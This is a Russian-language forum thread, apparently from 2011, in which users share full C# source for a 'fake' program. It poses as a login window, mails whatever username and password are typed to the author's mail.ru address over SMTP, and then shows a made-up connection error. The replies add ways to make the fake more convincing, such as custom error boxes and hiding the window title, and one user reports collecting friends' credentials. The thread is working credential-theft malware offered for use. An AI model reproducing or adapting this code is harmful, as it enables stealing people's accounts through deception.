Re: Создаём фейк программмы. Часть 2. C# version (by OveRKinG)
Цитата:
Ааааа у меня ничего не отправляет, киньте кто-нибудь исходник РАБОТАЮЩЕГО фейка, где я могу бы просто вписать свое мыло и пароль и он РАБОТАЛ плиииииииз Заплюсую до смерти
Если что-то не получается, ищите проблемы на вашей стороне, у всех работает безотказно.
Сообщение от Timich
Ааааа у меня ничего не отправляет, киньте кто-нибудь исходник РАБОТАЮЩЕГО фейка, где я могу бы просто вписать свое мыло и пароль и он РАБОТАЛ плиииииииз Заплюсую до смерти
Добавлено через 26 минут
Можно сделать чтобы при нажатии на кнопку открывалась новая форма с вашим текстом!
Для этого создаем новую форму виндовс (Щелкаем правой кнопкой по названию вашего проекта в верхнем правом углу, жмем Добавить - Форма виндовс (Add - Form Windows))
Далее пишем в созданной форме что угодно например "Не удалось подключится к серверу"
Далее в первой форме заходим в исходный код кнопки и вписываем код:
Вот и все, теперь при нажатии на кнопку будет появляться вторая форма с вашим текстом!
Можно так.
Но мне кажеться это сильно палиться.
Пиши в код для кнопки:
Цитата:
MessageBox.Show("Твой текст", "Название окошка, которое появиться");
Можно ещё приукрасить, например добавить иконку в окошко.
Для этого пишем:
Я разобрался в чем проблема, код реально рабочий, просто у меня на Вин7 не отправляло сообщения! Скинул друзьям у которых вин ХР у них все пашет, данные пришли в течении 10 секунд! Кстати по какой причине на Вин7 х64 может не отправлять сообщения через смтп сервер?
MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody);????
ничего в них вписывать не нужно.
только можешь сменить надпись, логин,пароль которая на мыло придет.
Если не нужен комбобокс то будет по-другому немного:
Цитата:
Сообщение от Timich
Код:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Mail;
namespace Feik1
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
SmtpClient client = new SmtpClient("smtp.mail.ru", 2525); // порт 2525 можно поменять на 25 если фейк не работает
//если хотите чтоб приходило на яндекс впешите его по англ вместо mail
client.Credentials = new System.Net.NetworkCredential("между кавычками введите свое мыло", "и также свой пасс");
string msgFrom = "опять ваше мыло";
string msgTo = "опять ваше мыло";
string msgSubject = "Имя темы сообщения в ящике";
string msgBody = String.Format("\nЛогин: {1}\nПароль: {2}",ToString(), textBox1.Text, textBox2.Text);
MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody);
try
{
client.Send(msg);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);// для вылова ошибки
}
MessageBox.Show("Ошибка соединения с сервером,\nпроверьте параметры подключения", "Ошибка");
}
}
}
Помог? - поставь спс
Последний раз редактировалось bohdan09; 10.04.2011 в 11:27.
А можно убрать заголовок окна (explorer'a), ну типа чтоб выглядело как в запускаторе???
Для тех кто не понял, вот скрин:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Добавлено через 3 часа 12 минут
По возможности подробный гайдик в лс или skype: dronord-acc
________________ Помог? Жми спасибо!) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Последний раз редактировалось -†- DRONORD -†-; 28.08.2011 в 01:01.
Причина: Добавлено сообщение